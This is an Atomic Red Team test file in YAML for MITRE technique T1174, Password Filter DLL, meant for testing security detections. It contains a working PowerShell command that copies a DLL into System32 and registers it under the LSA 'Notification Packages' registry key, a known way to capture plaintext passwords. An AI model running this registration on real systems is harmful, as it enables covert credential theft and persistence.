Carrie Roberts
1bfefdacfc
* provide elevation_required attribute * provide elevation_required attribute * provide elevation_required attribute
28 lines
1.0 KiB
YAML
28 lines
1.0 KiB
YAML
---
|
|
attack_technique: T1174
|
|
display_name: Password Filter DLL
|
|
|
|
atomic_tests:
|
|
- name: Install and Register Password Filter DLL
|
|
description: |
|
|
Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges.
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
input_dll:
|
|
description: Path to DLL to be installed and registered
|
|
type: Path
|
|
default: C:\AtomicRedTeam\atomics\T1174\src\AtomicPasswordFilter.dll
|
|
|
|
executor:
|
|
name: powershell
|
|
elevation_required: true
|
|
command: |
|
|
$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
|
|
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
|
|
$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
|
|
$notificationPackagesValues += $passwordFilterName
|
|
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
|
|
Restart-Computer -Confirm |